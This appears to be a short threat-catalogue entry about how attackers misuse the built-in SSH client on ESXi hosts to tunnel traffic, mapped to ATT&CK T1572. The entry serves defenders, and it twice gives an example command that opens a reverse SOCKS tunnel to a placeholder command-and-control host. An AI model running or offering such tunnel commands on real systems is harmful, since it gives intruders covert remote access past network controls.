.. /ssh
Star

Inbuilt SSH client used to remote port-forward using a tunnel.

Paths:

/bin/ssh
/sbin/ssh

Resources:

https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/

Acknowledgements:

Ren Jie Yow
Zhongyuan Hau (Aaron)

Tunnel traffic

SSH client used to create a tunnel.
```
ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
```
Use case
An adversary uses the native SSH binary to create a tunnel to remote port-forwarding to their C2 host.

Privileges required
User

Operating systems
ESXi
Additional Procedural Examples
- ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
ATT&CK® technique
T1572